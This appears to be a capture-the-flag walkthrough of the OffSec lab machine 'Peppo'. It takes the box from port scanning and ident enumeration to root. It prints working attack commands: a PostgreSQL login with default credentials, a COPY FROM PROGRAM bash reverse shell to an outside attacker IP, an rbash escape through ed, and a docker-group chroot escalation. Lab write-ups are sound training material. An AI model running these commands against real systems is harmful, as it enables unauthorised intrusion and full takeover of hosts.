Peppo Walkthrough
Platform: Offsec | PG Practice
Difficulty: Very Difficult
OS: Linux
Author: Pawan Kumar (Vulntricks)
🛰️ 1. Reconnaissance
Quick Scan using RustScan
As Usual My favourite Rustscan result
─$ rustscan -a $IP
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 61
113/tcp open ident syn-ack ttl 61
5432/tcp open postgresql syn-ack ttl 60
8080/tcp open http-proxy syn-ack ttl 60
10000/tcp open snet-sensor-mgmt syn-ack ttl 61
Nmap Scan Result
Now enumerating it further with nmap to see the service versions
─$ nmap -sV -sC -p22,113,5432,8080,10000 -oN nmap_tcp $IP
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
|_auth-owners: root
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
|_http-title: Redmine
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
10000/tcp open snet-sensor-mgmt?
|_auth-owners: eleanor
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| Connection: close
| FourOhFourRequest:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 07 Jul 2025 15:03:18 GMT
| Connection: close
| Hello World
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/plain
| Date: Mon, 07 Jul 2025 15:03:11 GMT
| Connection: close
|_ Hello World
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Port 22 SSH
Looks like the service is owned by root user _auth-owners: root This is what I could understand without much effort 🥸 , We'll look deeper into it if needed.
Port 113 Ident
Looks interesting, I found that it a server daemon that responds to requests on TCP port 113, providing user identification information for TCP connections.
Found a tool which can be used to enumerate user enumeartion, ident-user-enum .
─$ ident-user-enum $IP 113
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.190.60:113 nobody
Confirmed again we have a user nobody .
If we pass ssh port as well we get 2 users.
└─$ ident-user-enum $IP 113 22
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.190.60:113 nobody
192.168.190.60:22 root
Enumerating postgresql
Easy way is to try to connect to it using default credentials postgres:postgers
─$ psql -h 192.168.190.60 -p 5432 -U postgres
And Successfully connected.
Listing databases
Enumeartiing further found it in the hacktricks psql enum section, Looks like we can fetch data from the Machine
postgres=# CREATE TABLE demo(t text);
CREATE TABLE
postgres=# COPY demo from '/etc/passwd';
COPY 20
postgres=# SELECT * FROM demo;
Enumearting 8080 Webrick Httpd
What I could find is WEBrick is an HTTP server toolkit that can be configured as an HTTPS server, a proxy server, and a virtual-host server. So basically A web server, I am interested if it is vulnearble or not...
Used admin:admin as user and passowrd for login and it asks me to change password !!
So updated the password and I have access to admin.. Let's see this could be a rabbit hole.. So I have to be careful.
And some information looks important just because shows versions...
Enumearting 100000
└─$ ident-user-enum 192.168.190.60 10000
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.190.60:10000 eleanor
⛔️ Initial Access
Found this Medium article for command execution in postgresql;
so the idea is to create table put some command and then call to execute it:
Create Table shell
postgres=# CREATE TABLE shell(output text);
CREATE TABLE
User Program Parameter to pass the shell and setup a listner
postgres=# COPY shell FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/192.168.45.169/80 0>&1"';
Post Exploitation Enumeartion
Quick check on resources
for cmd in gcc cc python perl python3 python2 wget curl fetch nc ncat nc.traditional socat; do which $cmd >/dev/null 2>&1 && echo "[✔] $cmd: $(which $cmd)" || echo "[✘] $cmd: Not found"; done
looks like we have perl so let's get into tty shell
tried breaking out of the shell but failed ...
postgres@326cfee15738:~/data$ cd /home
cd /home
postgres@326cfee15738:/home$ ls
ls
postgres@326cfee15738:/home$ ls -lsa
ls -lsa
total 8
4 drwxr-xr-x 2 root root 4096 May 2 2020 .
4 drwxr-xr-x 1 root root 4096 Jun 1 2020 ..
postgres@326cfee15738:/home$ pwd
pwd
/home
postgres@326cfee15738:/home$ cd ..
Could not see any other user when login through this
Acces using the traditional given ssh shell
elenor:elenor
check capabilities again
eleanor@peppo:~$ echo $SHELL
/bin/rbash
eleanor@peppo:~$ cd /home/eleanor/bin
-rbash: cd: restricted
eleanor@peppo:~$ ls
bin helloworld local.txt
eleanor@peppo:~$ cat local.txt
-rbash: cat: command not found
eleanor@peppo:~$ echo $PATH
/home/eleanor/bin
Can't execute commands so, | Found an article for using rbash on techmint
Let's try to break out of the shell,
eleanor@peppo:~$ ls -lsa /home/eleanor/bin
total 8
4 drwxr-xr-x 2 eleanor eleanor 4096 Jun 1 2020 .
4 drwxr-xr-x 4 eleanor eleanor 4096 Jul 9 2020 ..
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 chmod -> /bin/chmod
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 chown -> /bin/chown
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 ed -> /bin/ed
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 ls -> /bin/ls
0 lrwxrwxrwx 1 root root 7 Jun 1 2020 mv -> /bin/mv
0 lrwxrwxrwx 1 root root 9 Jun 1 2020 ping -> /bin/ping
0 lrwxrwxrwx 1 root root 10 Jun 1 2020 sleep -> /bin/sleep
0 lrwxrwxrwx 1 root root 14 Jun 1 2020 touch -> /usr/bin/touch
so we can execute limited commands only .. I could change the shell using ed
eleanor@peppo:~$ ed
!/bin/sh
$ whoami
/bin/sh: 1: whoami: not found
$ echo $SHELL
/bin/rbash
$ echo $PATH
/home/eleanor/bin
$ ed
!/bin/bash
eleanor@peppo:~$ whoami
bash: whoami: command not found
eleanor@peppo:~$ sudo ed
bash: sudo: command not found
eleanor@peppo:~$
Let's try updating the path again ...
eleanor@peppo:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
eleanor@peppo:~$ pwd
/home/eleanor
eleanor@peppo:~$ whoami
eleanor
Now we can execute commands after updating the path ... Good news ...
Privilege Escalation
Unable to download anything
eleanor@peppo:~$ cat /etc/group
.
.
.
.
ssh:x:111:
eleanor:x:1000:
docker:x:999:eleanor
so docker seems to be one thing exclusive that eleanor is part of...
eleanor@peppo:~$ which docker
/usr/bin/docker
eleanor@peppo:~$ ls -lsa /usr/bin/docker
82972 -rwxr-xr-x 1 root root 84959304 May 28 2020 /usr/bin/docker
so only root is owner of docker, And eleanor is part of docker.
eleanor@peppo:~/helloworld$ ls -lsa -u /usr/bin/docker
82972 -rwxr-xr-x 1 root root 84959304 Jul 9 14:01 /usr/bin/docker
eleanor@peppo:~/helloworld$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
redmine latest 0c8429c66e07 5 years ago 542MB
postgres latest adf2b126dda8 5 years ago 313MB
eleanor@peppo:~/helloworld$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root
#
found this docker command from gtfobins